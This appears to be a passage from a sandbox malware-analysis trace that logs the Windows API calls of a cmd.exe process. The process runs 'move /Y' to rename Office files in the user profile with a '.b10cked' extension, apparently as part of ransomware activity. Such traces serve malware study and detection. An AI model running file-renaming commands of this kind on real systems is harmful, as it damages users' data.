(_String1="PROMPT", _String2="DATE") returned 12 [0172.274] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.274] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.274] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.274] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.274] GetEnvironmentStringsW () returned 0x392360* [0172.274] FreeEnvironmentStringsW (penv=0x392360) returned 1 [0172.274] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.274] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.274] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.274] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.274] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.274] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.274] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.274] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.274] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.274] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.274] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1afb50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.274] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1afb50, lpFilePart=0x1afb4c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1afb4c*="Desktop") returned 0x18 [0172.274] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.275] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af8cc | out: lpFindFileData=0x1af8cc) returned 0x3909f0 [0172.275] FindClose (in: hFindFile=0x3909f0 | out: hFindFile=0x3909f0) returned 1 [0172.275] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af8cc | out: lpFindFileData=0x1af8cc) returned 0x3909f0 [0172.275] FindClose (in: hFindFile=0x3909f0 | out: hFindFile=0x3909f0) returned 1 [0172.275] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af8cc | out: lpFindFileData=0x1af8cc) returned 0x3909f0 [0172.275] FindClose (in: hFindFile=0x3909f0 | out: hFindFile=0x3909f0) returned 1 [0172.275] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.275] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.275] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.275] GetEnvironmentStringsW () returned 0x390210* [0172.276] FreeEnvironmentStringsW (penv=0x390210) returned 1 [0172.276] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.276] GetConsoleOutputCP () returned 0x1b5 [0172.276] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.276] GetUserDefaultLCID () returned 0x409 [0172.276] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.276] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afc90, cchData=128 | out: lpLCData="0") returned 2 [0172.276] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afc90, cchData=128 | out: lpLCData="0") returned 2 [0172.276] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afc90, cchData=128 | out: lpLCData="1") returned 2 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.277] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.277] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.278] GetConsoleTitleW (in: lpConsoleTitle=0x380930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.278] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.278] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.278] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.278] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.279] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.279] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.279] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.279] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.279] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.279] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.279] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0172.283] GetConsoleTitleW (in: lpConsoleTitle=0x1af988, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.283] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0172.283] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.283] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.283] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.283] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.283] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.283] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.283] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.283] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.283] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.283] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.284] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.284] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.284] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.284] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.284] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.284] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.284] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.284] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.284] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.284] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.284] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0172.284] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.284] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.284] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.284] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.284] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.284] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0172.284] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.284] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0172.284] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.284] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.284] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.284] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.284] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0172.285] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.285] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.286] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af744, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af73c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af73c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.286] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0172.287] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0172.287] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0172.288] _wcsicmp (_String1="ONINTL~1.TRX", _String2=".") returned 65 [0172.288] _wcsicmp (_String1="ONINTL~1.TRX", _String2="..") returned 65 [0172.288] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl~1.trx")) returned 0x2020 [0172.609] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x391f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.609] SetErrorMode (uMode=0x0) returned 0x0 [0172.609] SetErrorMode (uMode=0x1) returned 0x0 [0172.609] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1af0cc, lpFilePart=0x1af0b4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX", lpFilePart=0x1af0b4*="ONINTL~1.TRX") returned 0x3c [0172.609] SetErrorMode (uMode=0x0) returned 0x1 [0172.610] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0172.610] _wcsicmp (_String1="ONINTL~1.TRX", _String2=".") returned 65 [0172.610] _wcsicmp (_String1="ONINTL~1.TRX", _String2="..") returned 65 [0172.610] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl~1.trx")) returned 0x2020 [0172.610] SetErrorMode (uMode=0x0) returned 0x0 [0172.610] SetErrorMode (uMode=0x1) returned 0x0 [0172.610] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1af548, lpFilePart=0x1af2e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX", lpFilePart=0x1af2e0*="ONINTL~1.TRX") returned 0x3c [0172.610] SetErrorMode (uMode=0x0) returned 0x1 [0172.610] SetErrorMode (uMode=0x0) returned 0x0 [0172.610] SetErrorMode (uMode=0x1) returned 0x0 [0172.610] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1af750, lpFilePart=0x1af2e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked", lpFilePart=0x1af2e0*="ONINTL.DLL.trx_dll.b10cked") returned 0x4a [0172.610] SetErrorMode (uMode=0x0) returned 0x1 [0172.610] SetLastError (dwErrCode=0x0) [0172.610] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.dll.trx_dll.b10cked")) returned 0xffffffff [0172.611] GetLastError () returned 0x2 [0172.611] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x1aec5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aec5c) returned 0x392128 [0172.611] FindNextFileW (in: hFindFile=0x392128, lpFindFileData=0x1aec5c | out: lpFindFileData=0x1aec5c) returned 0 [0172.611] GetLastError () returned 0x12 [0172.611] FindClose (in: hFindFile=0x392128 | out: hFindFile=0x392128) returned 1 [0172.613] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x391cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x391cb8) returned 0x392128 [0172.614] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1aeef4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0172.614] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x1aeef4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0172.614] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.dll.trx_dll")) returned 0x2020 [0172.617] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0172.618] FindClose (in: hFindFile=0x392128 | out: hFindFile=0x392128) returned 1 [0172.618] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1aeea8 | out: _Buffer=" 1") returned 9 [0172.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.618] GetFileType (hFile=0x7) returned 0x2 [0172.619] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.619] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1aee34 | out: lpMode=0x1aee34) returned 1 [0172.619] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.619] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1aee68 | out: lpConsoleScreenBufferInfo=0x1aee68) returned 1 [0172.619] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0172.619] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1aeea8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0172.619] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1aee8c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1aee8c*=0x1a) returned 1 [0172.620] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.620] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.620] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.620] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.620] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.620] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.620] SetConsoleInputExeNameW () returned 0x1 [0172.620] GetConsoleOutputCP () returned 0x1b5 [0172.620] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.620] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.621] exit (_Code=0) Process: id = "292" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168e0" os_pid = "0xfcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22935 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22936 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22937 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22938 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 22939 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22940 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22941 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22942 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22943 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 22944 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23429 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23430 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23431 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23432 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 23433 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 23434 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23435 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23436 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23437 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23438 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23439 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23440 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23441 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23442 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23443 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 23444 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23445 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23446 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23447 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 23448 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 23449 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 23450 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 23451 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23452 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 360 os_tid = 0x9d8 [0172.231] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fdcc | out: lpSystemTimeAsFileTime=0x20fdcc*(dwLowDateTime=0x9c8d6d80, dwHighDateTime=0x1d440a9)) [0172.231] GetCurrentProcessId () returned 0xfcc [0172.231] GetCurrentThreadId () returned 0x9d8 [0172.231] 